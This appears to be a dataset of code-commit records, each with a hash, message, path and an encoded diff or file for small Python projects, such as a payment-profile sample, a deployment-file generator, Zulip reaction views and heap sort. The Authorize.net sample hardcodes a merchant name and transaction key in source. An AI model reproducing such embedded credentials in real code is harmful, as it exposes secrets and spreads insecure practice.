args.type%0A%09for file in os.listdir(fromdir):%0A%09%09if file == %22desktop.ini%22:%0A%09%09%09continue%0A%09%09filein = os.path.join(fromdir, file)%0A%09%09fileout = os.path.join(outdir, file)%0A%09%09try:%0A%09%09%09CutImage(filein, fileout, width, height, type)%0A%09%09except Exception as e:%0A%09%09%09print(e)%0A%09%09%09continue%0Aif __name__ == '__main__':%0A%09main()
|
|
41933fa83138f3572b899839a721b95b877d09e6
|
Sample code for create customer payment profile
|
CustomerProfiles/create-customer-payment-profile.py
|
CustomerProfiles/create-customer-payment-profile.py
|
Python
| 0.996976 |
@@ -0,0 +1,1239 @@
+from authorizenet import apicontractsv1%0Afrom authorizenet.apicontrollers import *%0A%0AmerchantAuth = apicontractsv1.merchantAuthenticationType()%0AmerchantAuth.name = '5KP3u95bQpv'%0AmerchantAuth.transactionKey = '4Ktq966gC55GAX7S'%0A%0AcreditCard = apicontractsv1.creditCardType()%0AcreditCard.cardNumber = %224111111111111111%22%0AcreditCard.expirationDate = %222020-12%22%0A%0Apayment = apicontractsv1.paymentType()%0Apayment.creditCard = creditCard%0A%0Aprofile = apicontractsv1.customerPaymentProfileType()%0Aprofile.payment = payment%0A%0AcreateCustomerPaymentProfile = apicontractsv1.createCustomerPaymentProfileRequest()%0AcreateCustomerPaymentProfile.merchantAuthentication = merchantAuth%0AcreateCustomerPaymentProfile.paymentProfile = profile%0AcreateCustomerPaymentProfile.customerProfileId = '36731856'%0A%0AcreateCustomerPaymentProfileController = createCustomerPaymentProfileController(createCustomerPaymentProfile)%0AcreateCustomerPaymentProfileController.execute()%0A%0Aresponse = createCustomerPaymentProfileController.getresponse()%0A%0Aif (response.messages.resultCode==%22Ok%22):%0A%09print %22Successfully created a customer payment profile with id: %25s%22 %25 response.customerPaymentProfileId%0Aelse:%0A%09print %22Failed to create customer payment profile %25s%22 %25 response.messages.message%5B0%5D.text%0A
|
|
f36a0d1d53b4a15d8ead51a54260946f293a8718
|
add mac free memory script
|
mac_free.py
|
mac_free.py
|
Python
| 0 |
@@ -0,0 +1,1226 @@
+#!/usr/bin/python%0A'''%0ACreated on Jun 1, 2014%0A %0A@author: jay%0A'''%0A %0Aimport subprocess%0Aimport re%0A %0A# Get process info%0Aps = subprocess.Popen(%5B'ps', '-caxm', '-orss,comm'%5D, stdout=subprocess.PIPE).communicate()%5B0%5D%0Avm = subprocess.Popen(%5B'vm_stat'%5D, stdout=subprocess.PIPE).communicate()%5B0%5D%0A %0A# Iterate processes%0AprocessLines = ps.split('%5Cn')%0Asep = re.compile('%5B%5Cs%5D+')%0ArssTotal = 0 # kB%0Afor row in range(1,len(processLines)):%0A rowText = processLines%5Brow%5D.strip()%0A rowElements = sep.split(rowText)%0A try:%0A rss = float(rowElements%5B0%5D) * 1024%0A except:%0A rss = 0 # ignore...%0A rssTotal += rss%0A %0A# Process vm_stat%0AvmLines = vm.split('%5Cn')%0Asep = re.compile(':%5B%5Cs%5D+')%0AvmStats = %7B%7D%0Afor row in range(1,len(vmLines)-2):%0A rowText = vmLines%5Brow%5D.strip()%0A rowElements = sep.split(rowText)%0A vmStats%5B(rowElements%5B0%5D)%5D = int(rowElements%5B1%5D.strip('%5C.')) * 4096%0A %0Aprint 'Wired Memory:%5Ct%5Ct%25d MB' %25 ( vmStats%5B%22Pages wired down%22%5D/1024/1024 )%0Aprint 'Active Memory:%5Ct%5Ct%25d MB' %25 ( vmStats%5B%22Pages active%22%5D/1024/1024 )%0Aprint 'Inactive Memory:%5Ct%25d MB' %25 ( vmStats%5B%22Pages inactive%22%5D/1024/1024 )%0Aprint 'Free Memory:%5Ct%5Ct%25d MB' %25 ( vmStats%5B%22Pages free%22%5D/1024/1024 )%0Aprint 'Real Mem Total (ps):%5Ct%25.3f MB' %25 ( rssTotal/1024/1024 )
|
|
375662aae4ab24444cbe0c8372c01ff8b8a08bc1
|
add a TODO
|
myriadeploy/create_deployment.py
|
myriadeploy/create_deployment.py
|
#!/usr/bin/env python
""" Create a Myria deployment file """
import sys
import argparse
from itertools import groupby
def get_deployment(path, coordinator_hostname, worker_hostnames, name='myria',
                   rest_port=8753, database_type='postgresql',
                   database_port=5432, heap='2g', debug=False,
                   database_username=None, database_password=None,
                   coordinator_port=9001, worker_ports=None,
                   worker_base_port=8001):
    """Build the full text of a Myria deployment file.

    The file is the concatenation of three sections: the [deployment]
    header, the [master] (coordinator) entry, and the [workers] list.
    """
    header = _get_header(path, name, rest_port, database_type,
                         database_port, heap, debug,
                         database_username, database_password)
    coordinator = _get_coordinator(coordinator_hostname, coordinator_port)
    workers = _get_workers(worker_hostnames, worker_ports, worker_base_port)
    return header + coordinator + workers
def _get_header(path, name='myria', rest_port=8753, database_type='postgresql',
                database_port=5432, heap='2g', debug=False,
                database_username=None, database_password=None):
    """ Build the [deployment] section of a Myria deployment file.

    Optional entries (username, database_password, max_heap_size,
    debug_mode) are emitted only when the corresponding argument is
    truthy.  The section ends with a blank line.
    """
    lines = ['[deployment]',
             'name = %s' % name,
             'path = %s' % path,
             'dbms = %s' % database_type,
             'database_name = %s' % name,
             'database_port = %s' % database_port,
             'rest_port = %s' % rest_port]

    if database_username:
        lines.append('username = %s' % database_username)
    if database_password:
        lines.append('database_password = %s' % database_password)
    if heap:
        lines.append('max_heap_size = -Xmx%s' % heap)
    if debug:
        lines.append('debug_mode = True')

    # Trailing '\n\n' terminates the last entry and leaves one blank
    # separator line before the next section.
    return '\n'.join(lines) + '\n\n'
def _get_coordinator(hostname, port=9001):
    """ Build the [master] section of a Myria deployment file. """
    # The coordinator is always listed under id 0; worker ids start at 1.
    return '[master]\n' + '0 = %s:%s\n\n' % (hostname, port)
def _get_workers(hostnames, ports=None, base_port=8001):
    """ Generates the worker section of a Myria deployment file.

    If explicit ports are not given, hostnames are sorted and workers
    co-located on the same host receive consecutive ports starting at
    base_port.

    Raises:
        ValueError: if explicit ports are given but their count does not
            match the number of hostnames (previously zip() silently
            dropped the extra workers or ports).
    """
    workers = '[workers]\n'
    if not ports:
        # Group identical hostnames together so each worker on a host
        # gets base_port, base_port + 1, ... in order.
        hostnames = sorted(hostnames)
        ports = [offset + base_port
                 for hostname, group in groupby(hostnames)
                 for offset in range(len(list(group)))]
    elif len(ports) != len(hostnames):
        raise ValueError('expected %d worker ports, got %d'
                         % (len(hostnames), len(ports)))
    # Worker ids are 1-based; id 0 is reserved for the coordinator.
    for index, (hostname, port) in enumerate(zip(hostnames, ports)):
        workers += '{} = {}:{}\n'.format(index + 1, hostname, port)
    return workers
def main(argv):
    """ Argument parsing wrapper for generating a Myria deployment file

    Parses command-line arguments whose dest names mirror
    get_deployment's keyword parameters, so the parsed namespace can be
    splatted directly into get_deployment below.  Prints the resulting
    deployment file to stdout.
    """
    parser = argparse.ArgumentParser(
        description='Create a Myria deployment file')
    # Positional arguments.
    parser.add_argument(
        'path', type=str,
        help='Installation path for catalog and worker metadata storage')
    parser.add_argument(
        'coordinator_hostname', metavar='coordinator', type=str,
        help='Hostname for the coordinator')
    parser.add_argument(
        'worker_hostnames', metavar='workers', type=str, nargs='+',
        help='One or more worker hostnames')
    # Optional arguments.
    parser.add_argument(
        '--worker-ports', dest='worker_ports', type=int, nargs='*',
        default=None, help='One or more ports for worker communication')
    parser.add_argument(
        '--name', type=str, default='myria',
        help='Name identifying this installation')
    parser.add_argument(
        '--rest-port', dest='rest_port', type=int, default=8753,
        help='Port for REST requests')
    parser.add_argument(
        '--database-type', dest='database_type', type=str,
        default='postgresql', help='Database type for Myria storage layer')
    # NOTE(review): the string default '5432' is run through type=int by
    # argparse (string defaults get the type conversion applied), so the
    # parsed value is the integer 5432.
    parser.add_argument(
        '--database-port', dest='database_port', type=int, default='5432',
        help='Port used to connect to storage layer')
    parser.add_argument(
        '--database-username', dest='database_username', type=str,
        default=None, help='Username for connecting to storage layer')
    parser.add_argument(
        '--database-password', dest='database_password', type=str,
        default=None, help='Password for connecting to storage layer')
    parser.add_argument(
        '--coordinator-port', dest='coordinator_port', type=int,
        default=9001, help='Port for coordinator communication')
    parser.add_argument(
        '--worker-base-port', dest='worker_base_port', type=int,
        default=8001, help='Base port for worker communication '
                           '(when worker-ports not specified)')
    parser.add_argument(
        '--heap', type=str, default='2g', help='Java VM heap size')
    parser.add_argument(
        '--debug', default=False, action='store_true',
        help='Enable debugging support')

    # Python 2 print statement (this file also uses xrange elsewhere).
    print get_deployment(**vars(parser.parse_args(argv[1:])))


if __name__ == "__main__":
    main(sys.argv)
|
Python
| 0.000014 |
@@ -2416,16 +2416,108 @@
up)))%5D%0A%0A
+ # TODO: add support for specifying different directories and database names for workers%0A
for
|
d9be75200af8c63a4457b6fb6ee107f4e8aa1048
|
Create medium_BinaryConverter.py
|
medium_BinaryConverter.py
|
medium_BinaryConverter.py
|
Python
| 0.000001 |
@@ -0,0 +1,149 @@
+%22%22%22%0AConvert from binary string to%0Ainteger%0A%22%22%22%0Adef BinaryConverter(str): %0A return int(str,2)%0A %0A %0Aprint BinaryConverter(raw_input()) %0A
|
|
470ae84c10d889b725316f6f19b1049af0c87125
|
Fix Array class name
|
blaze/objects/array.py
|
blaze/objects/array.py
|
"""This file defines the Concrete Array --- a leaf node in the expression graph
A concrete array is constructed from a Data Descriptor Object which handles the
indexing and basic interpretation of bytes
"""
from __future__ import absolute_import, division, print_function
import datashape
from ..compute.expr import dump
from ..compute.ops import ufuncs
from .. import compute
from ..datadescriptor import (IDataDescriptor,
DyNDDataDescriptor,
DeferredDescriptor)
from ..io import _printing
class Array(object):
    """An Array contains:

        DataDescriptor
            Sequence of Bytes (where are the bytes)
            Index Object (how do I get to them)
            Data Shape Object (what are the bytes? how do I interpret them)
        axis and dimension labels
        user-defined meta-data (whatever are needed --- provenance propagation)
    """

    def __init__(self, data, axes=None, labels=None, user=None):
        """
        Parameters
        ----------
        data : IDataDescriptor
            Descriptor supplying the bytes, indexing, and dshape.
        axes : list, optional
            Axis names; defaults to '' for each of the len(dshape) - 1
            dimensions.
        labels : list, optional
            Dimension labels; defaults to None per dimension.
        user : dict, optional
            User-defined metadata.  Defaults to a fresh empty dict for
            each instance (a mutable ``user={}`` default here would be
            shared and aliased across every Array).
        """
        if not isinstance(data, IDataDescriptor):
            raise TypeError(('Constructing a blaze array directly '
                             'requires a data descriptor, not type '
                             '%r') % (type(data)))
        self._data = data
        self.axes = axes or [''] * (len(self._data.dshape) - 1)
        self.labels = labels or [None] * (len(self._data.dshape) - 1)
        self.user = {} if user is None else user
        self.expr = None

        if isinstance(data, DeferredDescriptor):
            # NOTE: we need 'expr' on the Array to perform dynamic programming:
            #       Two concrete arrays should have a single Op! We cannot
            #       store this in the data descriptor, since there are many
            self.expr = data.expr # hurgh

        # Inject the record attributes.
        # This is a hack to help get the blaze-web server onto blaze arrays.
        ms = data.dshape
        if isinstance(ms, datashape.DataShape): ms = ms[-1]
        if isinstance(ms, datashape.Record):
            props = {}
            for name in ms.names:
                props[name] = _named_property(name)
            # Use a valid identifier ('Array', not 'blaze.Array') as the
            # name of the dynamically created subclass.
            self.__class__ = type('Array', (Array,), props)

        # Need to inject attributes on the Array depending on dshape
        # attributes, in cases other than Record
        if data.dshape in [datashape.dshape('int32'), datashape.dshape('int64')]:
            props = {}
            def __int__(self):
                # Evaluate to memory
                e = compute.eval.eval(self)
                return int(e._data.dynd_arr())
            props['__int__'] = __int__
            self.__class__ = type('Array', (Array,), props)
        elif data.dshape in [datashape.dshape('float32'), datashape.dshape('float64')]:
            props = {}
            def __float__(self):
                # Evaluate to memory
                e = compute.eval.eval(self)
                return float(e._data.dynd_arr())
            props['__float__'] = __float__
            self.__class__ = type('Array', (Array,), props)
        elif ms in [datashape.complex_float32, datashape.complex_float64]:
            props = {}
            # complex() conversion only makes sense for 0-d / scalar-like
            # arrays (single-component dshape).
            if len(data.dshape) == 1:
                def __complex__(self):
                    # Evaluate to memory
                    e = compute.eval.eval(self)
                    return complex(e._data.dynd_arr())
                props['__complex__'] = __complex__
            props['real'] = _ufunc_to_property(ufuncs.real)
            props['imag'] = _ufunc_to_property(ufuncs.imag)
            self.__class__ = type('Array', (Array,), props)

    @property
    def dshape(self):
        """Datashape of the underlying data descriptor."""
        return self._data.dshape

    @property
    def deferred(self):
        """True when evaluation of this array is deferred."""
        return self._data.capabilities.deferred

    def view(self):
        """Dump the deferred expression graph; errors on concrete arrays."""
        if not self.capabilities.deferred:
            raise ValueError("Cannot call 'view' on a concrete array")

        term, context = self.expr
        ipython = False
        try:
            ipython = __IPYTHON__
        except NameError:
            pass

        return dump(term, ipython=ipython)

    def __array__(self):
        import numpy as np

        # TODO: Expose PEP-3118 buffer interface
        if hasattr(self._data, "__array__"):
            return np.array(self._data)

        raise NotImplementedError(self._data)

    def __iter__(self):
        return self._data.__iter__()

    def __getitem__(self, key):
        # Indexing wraps the sliced descriptor in a new Array.
        return Array(self._data.__getitem__(key))

    def __setitem__(self, key, val):
        self._data.__setitem__(key, val)

    def __len__(self):
        shape = self.dshape.shape
        if shape:
            return shape[0]
        return 1 # 0d

    def __nonzero__(self):
        # Python 2 truth protocol; only defined for 0-d arrays.
        if len(self.dshape.shape) == 0:
            # Evaluate to memory
            e = compute.eval.eval(self)
            return bool(e._data.dynd_arr())
        else:
            raise ValueError("The truth value of an array with more than one "
                             "element is ambiguous. Use a.any() or a.all()")

    def __str__(self):
        return _printing.array_str(self)

    def __repr__(self):
        return _printing.array_repr(self)
def _named_property(name):
    """ Property reading record field *name* from the data descriptor. """
    def _read(self):
        field_data = self._data.getattr(name)
        return Array(field_data)
    return property(_read)
def _ufunc_to_property(uf):
    """ Property applying ufunc *uf* to the instance on each access. """
    return property(lambda self: uf(self))
def binding(f):
    """ Wrap *f* so it can be attached to a class as an instance method. """
    def bound_method(self, *args):
        result = f(self, *args)
        return result
    return bound_method
def __rufunc__(f):
    """ Return a version of binary function *f* with swapped operands,
    for use as a reflected operator (__radd__ etc.). """
    def reflected(self, other):
        return f(other, self)
    return reflected
def _inject_special_binary(names):
    """ Attach binary operator dunders, plus their reflected forms,
    to Array.  *names* is a list of (ufunc_name, special_name) pairs. """
    for ufunc_name, special_name in names:
        uf = getattr(ufuncs, ufunc_name)
        setattr(Array, '__%s__' % special_name, binding(uf))
        setattr(Array, '__r%s__' % special_name, binding(__rufunc__(uf)))
def _inject_special(names):
    """ Attach unary operator dunders to Array.
    *names* is a list of (ufunc_name, special_name) pairs. """
    for ufunc_name, special_name in names:
        uf = getattr(ufuncs, ufunc_name)
        setattr(Array, '__%s__' % special_name, binding(uf))
# Wire the operator protocol onto Array at import time, mapping each
# blaze ufunc name to the corresponding special-method suffix.
_inject_special_binary([
    ('add', 'add'),
    ('subtract', 'sub'),
    ('multiply', 'mul'),
    ('true_divide', 'truediv'),
    ('mod', 'mod'),
    ('floor_divide', 'floordiv'),
    ('equal', 'eq'),
    ('not_equal', 'ne'),
    ('greater', 'gt'),
    ('greater_equal', 'ge'),
    ('less_equal', 'le'),
    ('less', 'lt'),
    ('divide', 'div'),
    ('bitwise_and', 'and'),
    ('bitwise_or', 'or'),
    ('bitwise_xor', 'xor'),
    ('power', 'pow'),
])
_inject_special([
    ('bitwise_not', 'invert'),
    ('negative', 'neg'),
])
"""
These should be functions
@staticmethod
def fromfiles(list_of_files, converters):
raise NotImplementedError
@staticmethod
def fromfile(file, converter):
raise NotImplementedError
@staticmethod
def frombuffers(list_of_buffers, converters):
raise NotImplementedError
@staticmethod
def frombuffer(buffer, converter):
raise NotImplementedError
@staticmethod
def fromobjects():
raise NotImplementedError
@staticmethod
def fromiterator(buffer):
raise NotImplementedError
"""
|
Python
| 0.000059 |
@@ -2124,38 +2124,32 @@
class__ = type('
-blaze.
Array', (Array,)
@@ -2153,24 +2153,24 @@
y,), props)%0A
+
%0A # N
@@ -2606,38 +2606,32 @@
class__ = type('
-blaze.
Array', (Array,)
@@ -2983,38 +2983,32 @@
class__ = type('
-blaze.
Array', (Array,)
@@ -3506,16 +3506,16 @@
s.imag)%0A
+
@@ -3545,14 +3545,8 @@
pe('
-blaze.
Arra
|
73cfd55b6db4e8623ff7c5f8d0df7433e694f8c4
|
Split dottable-dict logic into separate class.
|
metadatastore/document.py
|
metadatastore/document.py
|
import six
import mongoengine
from mongoengine.base.datastructures import BaseDict, BaseList
from mongoengine.base.document import BaseDocument
from bson.objectid import ObjectId
from datetime import datetime
from itertools import chain
from collections import MutableMapping
def _normalize(in_val):
    """
    Recursively convert mongoengine objects into plain Python values.

    Conversions applied:
      - mongoengine BaseDocument -> Document
      - mongoengine.base.datastructures.BaseDict -> dict
      - mongoengine.base.datastructures.BaseList -> list
      - ObjectId -> str
    Anything else is returned unchanged.

    Parameters
    ----------
    in_val : object
        Object to be sanitized

    Returns
    -------
    ret : object
        The 'sanitized' object
    """
    if isinstance(in_val, BaseDocument):
        return Document(in_val)
    if isinstance(in_val, BaseDict):
        return dict((_normalize(key), _normalize(value))
                    for key, value in six.iteritems(in_val))
    if isinstance(in_val, BaseList):
        return list(_normalize(item) for item in in_val)
    if isinstance(in_val, ObjectId):
        return str(in_val)
    return in_val
class Document(MutableMapping):
    """
    Copy the data out of a mongoengine.Document, including nested Documents,
    but do not copy any of the mongo-specific methods or attributes.

    Instances behave as a mapping over their non-underscore attributes;
    the same values stay reachable with dotted attribute access.
    """
    def __init__(self, mongo_document):
        """
        Parameters
        ----------
        mongo_document : mongoengine.Document
        """
        # _fields must exist before any setattr below, because our
        # __setattr__ records every non-underscore attribute into it.
        self._fields = set()
        self._name = mongo_document.__class__.__name__
        fields = set(chain(mongo_document._fields.keys(),
                           mongo_document._data.keys()))

        for field in fields:
            attr = getattr(mongo_document, field)

            attr = _normalize(attr)

            setattr(self, field, attr)
        # For debugging, add a human-friendly time_as_datetime attribute.
        # Note: since its name has no leading underscore, it also becomes
        # part of the mapping view via __setattr__.
        if hasattr(self, 'time'):
            self.time_as_datetime = datetime.fromtimestamp(self.time)

    def __setattr__(self, k, v):
        # Underscore-prefixed names are internal bookkeeping and are
        # excluded from the mapping view.
        self.__dict__[k] = v
        if not k.startswith('_'):
            self._fields.add(k)
        assert hasattr(self, k)
        assert k in self.__dict__

    def __delattr__(self, k):
        del self.__dict__[k]
        if not k.startswith('_'):
            self._fields.remove(k)
        assert k not in self._fields

    def __repr__(self):
        return "<{0} Document>".format(self._name)

    def __iter__(self):
        # Iterating a Document yields its field names, like a dict.
        return iter(self._fields)

    def __getitem__(self, key):
        # Map attribute lookup failures to KeyError for dict semantics.
        try:
            return getattr(self, key)
        except AttributeError:
            raise KeyError(key)

    def __delitem__(self, key):
        delattr(self, key)
        assert key not in self._fields

    def __setitem__(self, key, val):
        setattr(self, key, val)

    def __len__(self):
        return len(self._fields)

    def __contains__(self, key):
        return key in self._fields
|
Python
| 0 |
@@ -1137,22 +1137,36 @@
class Do
-cument
+ttableMutableMapping
(Mutable
@@ -1186,796 +1186,93 @@
%22%22%22
-%0A Copy the data out of a mongoengine.Document, including nested Documents,%0A but do not copy any of the mongo-specific methods or attributes.%0A %22%22%22%0A def __init__(self, mongo_document):%0A %22%22%22%0A Parameters%0A ----------%0A mongo_document : mongoengine.Document%0A %22%22%22%0A self._fields = set()%0A self._name = mongo_document.__class__.__name__%0A fields = set(chain(mongo_document._fields.keys(),%0A mongo_document._data.keys()))%0A%0A for field in fields:%0A attr = getattr(mongo_document, field)%0A%0A attr = _normalize(attr)%0A%0A setattr(self, field, attr)%0A # For debugging, add a human-friendly time_as_datetime attribute.%0A if hasattr(self, 'time'):%0A
+A dictionary where d.key is the same as d%5B'key'%5D%22%22%22%0A%0A def __init__(self):%0A
s
@@ -1271,67 +1271,27 @@
-
self.
-time_as_datetime = datetime.fromtimestamp(self.time
+_fields = set(
)%0A%0A
@@ -1654,84 +1654,8 @@
ds%0A%0A
- def __repr__(self):%0A return %22%3C%7B0%7D Document%3E%22.format(self._name)%0A%0A
@@ -1918,47 +1918,8 @@
key)
-%0A assert key not in self._fields
%0A%0A
@@ -2095,24 +2095,1010 @@
urn key in self._fields%0A
+%0A%0Aclass Document(DottableMutableMapping):%0A %22%22%22%0A Copy the data out of a mongoengine.Document, including nested Documents,%0A but do not copy any of the mongo-specific methods or attributes.%0A %22%22%22%0A def __init__(self, mongo_document):%0A %22%22%22%0A Parameters%0A ----------%0A mongo_document : mongoengine.Document%0A %22%22%22%0A super(Document, self).__init__()%0A self._name = mongo_document.__class__.__name__%0A fields = set(chain(mongo_document._fields.keys(),%0A mongo_document._data.keys()))%0A%0A for field in fields:%0A attr = getattr(mongo_document, field)%0A%0A attr = _normalize(attr)%0A%0A setattr(self, field, attr)%0A # For debugging, add a human-friendly time_as_datetime attribute.%0A if hasattr(self, 'time'):%0A self.time_as_datetime = datetime.fromtimestamp(self.time)%0A%0A def __repr__(self):%0A return %22%3C%7B0%7D Document%3E%22.format(self._name)%0A
|
b9034ca499ae8c0366ac8cd5ee71641f39c0ffba
|
Add taxonomy model and initiation
|
website/project/taxonomies/__init__.py
|
website/project/taxonomies/__init__.py
|
Python
| 0.000001 |
@@ -0,0 +1,1581 @@
+import json%0Aimport os%0A%0Afrom website import settings%0A%0Afrom modularodm import fields, Q%0Afrom modularodm.exceptions import NoResultsFound%0A%0Afrom framework.mongo import (%0A ObjectId,%0A StoredObject,%0A utils as mongo_utils%0A)%0A%0A%0A@mongo_utils.unique_on(%5B'id', '_id'%5D)%0Aclass Subject(StoredObject):%0A _id = fields.StringField(primary=True, default=lambda: str(ObjectId()))%0A%0A type = fields.StringField(required=True)%0A text = fields.StringField(required=True)%0A parent = fields.ForeignField('subject', index=True)%0A%0A%0Adef ensure_taxonomies():%0A with open(%0A os.path.join(%0A settings.APP_PATH,%0A 'website', 'static', 'plos_taxonomy.json'%0A )%0A ) as fp:%0A taxonomy = json.load(fp)%0A # For now, only PLOS taxonomies are loaded, other types possibly considered in the future%0A type = 'plos'%0A for subject_path in taxonomy.get('data'):%0A subjects = subject_path.split('_')%0A text = subjects%5B-1%5D%0A parent = None%0A if len(subjects) %3E 1:%0A parent = subjects%5B-2%5D%0A%0A try:%0A subject = Subject.find_one(%0A Q('text', 'eq', text) &%0A Q('type', 'eq', type)%0A )%0A except NoResultsFound:%0A subject = Subject(%0A type = type,%0A text = text,%0A parent = parent%0A )%0A else:%0A subject.type = type%0A subject.text = text%0A subject.parent = parent%0A subject.save()
|
|
e747714e16250f3c2e85d09520f36953b1c417c3
|
Create HeapSort.py
|
Algorithms/Sort_Algorithms/Heap_Sort/HeapSort.py
|
Algorithms/Sort_Algorithms/Heap_Sort/HeapSort.py
|
Python
| 0.000001 |
@@ -0,0 +1,1165 @@
+# Python program for implementation of heap Sort%0A %0A# To heapify subtree rooted at index i.%0A# n is size of heap%0Adef heapify(arr, n, i):%0A largest = i # Initialize largest as root%0A l = 2 * i + 1 # left = 2*i + 1%0A r = 2 * i + 2 # right = 2*i + 2%0A %0A # See if left child of root exists and is%0A # greater than root%0A if l %3C n and arr%5Bi%5D %3C arr%5Bl%5D:%0A largest = l%0A %0A # See if right child of root exists and is%0A # greater than root%0A if r %3C n and arr%5Blargest%5D %3C arr%5Br%5D:%0A largest = r%0A %0A # Change root, if needed%0A if largest != i:%0A arr%5Bi%5D,arr%5Blargest%5D = arr%5Blargest%5D,arr%5Bi%5D # swap%0A %0A # Heapify the root.%0A heapify(arr, n, largest)%0A %0A# The main function to sort an array of given size%0Adef heapSort(arr):%0A n = len(arr)%0A %0A # Build a maxheap.%0A for i in range(n, -1, -1):%0A heapify(arr, n, i)%0A %0A # One by one extract elements%0A for i in range(n-1, 0, -1):%0A arr%5Bi%5D, arr%5B0%5D = arr%5B0%5D, arr%5Bi%5D # swap%0A heapify(arr, i, 0)%0A %0A# Driver code to test above%0Aarr = %5B 12, 11, 13, 5, 6, 7%5D%0AheapSort(arr)%0An = len(arr)%0Aprint (%22Sorted array is%22)%0Afor i in range(n):%0A print (%22%25d%22 %25arr%5Bi%5D),%0A
|
|
5c0730d7caef6503e3f97849d9df6825c289e9a0
|
Fix check for valid emoji.
|
zerver/views/reactions.py
|
zerver/views/reactions.py
|
from __future__ import absolute_import
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from typing import Text
from zerver.decorator import authenticated_json_post_view,\
has_request_variables, REQ, to_non_negative_int
from zerver.lib.actions import do_add_reaction, do_remove_reaction
from zerver.lib.bugdown import emoji_list
from zerver.lib.message import access_message
from zerver.lib.request import JsonableError
from zerver.lib.response import json_success
from zerver.models import Reaction, UserProfile
@has_request_variables
def add_reaction_backend(request, user_profile, message_id, emoji_name):
    # type: (HttpRequest, UserProfile, int, Text) -> HttpResponse
    """Add user_profile's emoji_name reaction to the given message."""

    # access_message will throw a JsonableError exception if the user
    # cannot see the message (e.g. for messages to private streams).
    message = access_message(user_profile, message_id)[0]

    # An emoji is valid if it is either one of the realm's custom emoji
    # or one of the default emoji.  The previous check,
    # `set(realm_emoji) or set(emoji_list)`, ignored the default emoji
    # entirely whenever the realm had any custom emoji.
    if (emoji_name not in message.sender.realm.get_emoji() and
            emoji_name not in emoji_list):
        raise JsonableError(_("Emoji '%s' does not exist" % (emoji_name,)))

    # We could probably just make this check be a try/except for the
    # IntegrityError from it already existing, but this is a bit cleaner.
    if Reaction.objects.filter(user_profile=user_profile,
                               message=message,
                               emoji_name=emoji_name).exists():
        raise JsonableError(_("Reaction already exists"))

    do_add_reaction(user_profile, message, emoji_name)

    return json_success()
@has_request_variables
def remove_reaction_backend(request, user_profile, message_id, emoji_name):
    # type: (HttpRequest, UserProfile, int, Text) -> HttpResponse
    """Remove user_profile's emoji_name reaction from the given message."""

    # access_message will throw a JsonableError exception if the user
    # cannot see the message (e.g. for messages to private streams).
    message = access_message(user_profile, message_id)[0]

    # An emoji is valid if it is either one of the realm's custom emoji
    # or one of the default emoji.  The previous check,
    # `set(realm_emoji) or set(emoji_list)`, ignored the default emoji
    # entirely whenever the realm had any custom emoji.
    if (emoji_name not in message.sender.realm.get_emoji() and
            emoji_name not in emoji_list):
        raise JsonableError(_("Emoji '%s' does not exist" % (emoji_name,)))

    # We could probably just make this check be a try/except for the
    # IntegrityError from it already existing, but this is a bit cleaner.
    if not Reaction.objects.filter(user_profile=user_profile,
                                   message=message,
                                   emoji_name=emoji_name).exists():
        raise JsonableError(_("Reaction does not exist"))

    do_remove_reaction(user_profile, message, emoji_name)

    return json_success()
|
Python
| 0.000062 |
@@ -551,16 +551,23 @@
eaction,
+ Realm,
UserPro
@@ -572,16 +572,280 @@
rofile%0A%0A
+def check_valid_emoji(realm, emoji_name):%0A # type: (Realm, Text) -%3E None%0A if emoji_name in set(realm.get_emoji().keys()):%0A return%0A if emoji_name in emoji_list:%0A return%0A raise JsonableError(_(%22Emoji '%25s' does not exist%22 %25 (emoji_name,)))%0A%0A
@has_req
@@ -1205,193 +1205,48 @@
-existing_emojis = set(message.sender.realm.get_emoji().keys()) or set(emoji_list)%0A if emoji_name not in existing_emojis:%0A raise JsonableError(_(%22Emoji '%25s' does not exist%22 %25 (
+check_valid_emoji(message.sender.realm,
emoj
@@ -1243,35 +1243,32 @@
ealm, emoji_name
-,))
)%0A%0A # We coul
@@ -2081,193 +2081,48 @@
-existing_emojis = set(message.sender.realm.get_emoji().keys()) or set(emoji_list)%0A if emoji_name not in existing_emojis:%0A raise JsonableError(_(%22Emoji '%25s' does not exist%22 %25 (
+check_valid_emoji(message.sender.realm,
emoj
@@ -2127,19 +2127,16 @@
oji_name
-,))
)%0A%0A #
|
17fcfd6d1962b23429d48a8a45dfb0944c2f1453
|
Add constraints.py
|
conference_scheduler/constraints.py
|
conference_scheduler/constraints.py
|
Python
| 0.000003 |
@@ -0,0 +1,165 @@
+from typing import Callable, List, Dict%0A%0A%0Aclass Constraint(NamedTuple):%0A function: Callable%0A args: List%0A kwargs: Dict%0A operator: Callable%0A value: int%0A
|
|
e9efb5e2ba19fcda77e35d0efdaa03b13d025df0
|
create model of a feature
|
devmine/app/models/feature.py
|
devmine/app/models/feature.py
|
Python
| 0.000001 |
@@ -0,0 +1,322 @@
+from sqlalchemy import (%0A Column,%0A Integer,%0A String%0A)%0A%0Afrom devmine.app.models import Base%0A%0A%0Aclass Feature(Base):%0A %22%22%22Model of a feature.%22%22%22%0A%0A __tablename__ = 'features'%0A%0A id = Column(Integer, primary_key=True)%0A name = Column(String, nullable=False, unique=True)%0A%0A def __init__(self):%0A pass%0A
|
|
7491f500c75850c094158b4621fdef602bce3d27
|
Add benchmarks for custom generators
|
benchmarks/benchmarks/benchmark_custom_generators.py
|
benchmarks/benchmarks/benchmark_custom_generators.py
|
Python
| 0 |
@@ -0,0 +1,1776 @@
